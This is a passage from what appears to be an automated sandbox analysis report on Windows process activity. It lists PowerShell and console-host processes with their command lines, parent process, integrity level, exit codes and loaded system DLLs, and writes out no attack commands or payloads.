c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\windowsbase\8604bd365c35cb553eff5fc8fd67fd19\windowsbase.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentationcore\62b9468240b1680a41ae0b06684c40d5\presentationcore.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentatio5ae0f00f#\3eca476a270a2cb119f487c890810379\presentationframework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xaml\753248c2082aaa25ba3f3b64f8f24362\system.xaml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml.linq\b59428c2a855f7044b339e8206043346\system.xml.linq.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\microsoft.net\assembly\gac_64\microsoft.visualbasic.activities.compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\microsoft.visualbasic.activities.compiler.dll
c:\windows\system32\msvcp120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\microsoft.v9921e851#\94a3f05ae4dab0ff71443505d0ee300b\microsoft.visualbasic.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.wrapper.dll
c:\windows\system32\ntmarta.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.runteb92aa12#\509b15a107dedcf707e7cd6e17e061cd\system.runtime.serialization.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrcompression.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll

PID
452
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\clbcatq.dll

PID
1084
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
1948
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
5836
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
2692
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
1080
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
3404
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\win32u.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
3864
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
